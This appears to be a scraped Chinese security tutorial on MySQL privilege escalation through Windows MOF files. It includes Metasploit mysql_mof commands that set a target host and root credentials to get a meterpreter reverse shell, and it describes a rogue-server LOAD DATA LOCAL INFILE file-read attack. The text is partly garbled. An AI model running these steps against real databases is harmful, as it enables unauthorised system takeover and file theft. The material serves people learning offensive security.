时间:2021-07-01 10:21:17 帮助过:4人阅读
叫做”托管对象格式”,其作用是每隔五秒就会去监控进程创建和死亡
(1) 原理:
MOF文件既然每五秒就会执行,而且是系统权限,我们通过mysql将文件写入一个MOF文件替换掉原有的MOF文件,然后系统每隔五秒就会执行一次我们上传的MOF。MOF当中有一段是vbs脚本,我们可以通过控制这段vbs脚本的内容让系统执行命令,进行提权。
利用条件
Windows<=2003
mysql在c:windows/system32/mof目录有写权限
已知数据库账号密码
这个提权方式条件非常严苛,数据库在system32写文件这个条件一般很难达到。
而且较新的系统无法使用MOF提权
技巧:
要是能够通过网页连接管理(phpmyadmin),则可以修改host为“%”并刷新权限后,则可以通过msf等工具远程连接数据库。
默认root等账号不允许远程连接,除非管理员或者数据库用户自己设置
Msf直接mof提权
Msf 下有Mof 提权模块 ,不过该漏洞成功跟操作系统权限和Mysql数据库版本有关
执行成功后会直接反弹 shell 到 meterpreter
use exploit/windows/mysql/mysql_mof
setrhost 192.168.157.1 #设置需要提权的远程主机IP地址
setrport 3306 #设置mysql的远程端口
setpasswordroot #设置mysql数据库root密码
setusername root #设置mysql用户名
options #查看设置
run 0
原理:
当服务端执行load data local infile时,会从客户端会读取对应的文件。 //load data infile则是从服务端本身读取
mysql客户端连接服务端时,服务端可以让客户端执行sql语句,
所以伪造一个服务端,让客户端连接并执行load data local infile即可任意文件读。
这里推荐下 ev0A大佬的工具:https://github.com/ev0A/Mysqlist
例子: phpmyadmin开启远程登陆后就会出现该漏洞
参考文章:
https://p0sec.net/index.php/archives/117/
https://www.cnblogs.com/wocalieshenmegui/p/5917967.html
https://www.cnblogs.com/sfriend/p/11365999.html
https://www.cnblogs.com/csyxf/p/10241456.html
https://www.cnblogs.com/wintrysec/p/10875242.html
https://paper.seebug.org/218/
sql注入
标签:ring 操作 windows pytho 允许 sql 接管 cut php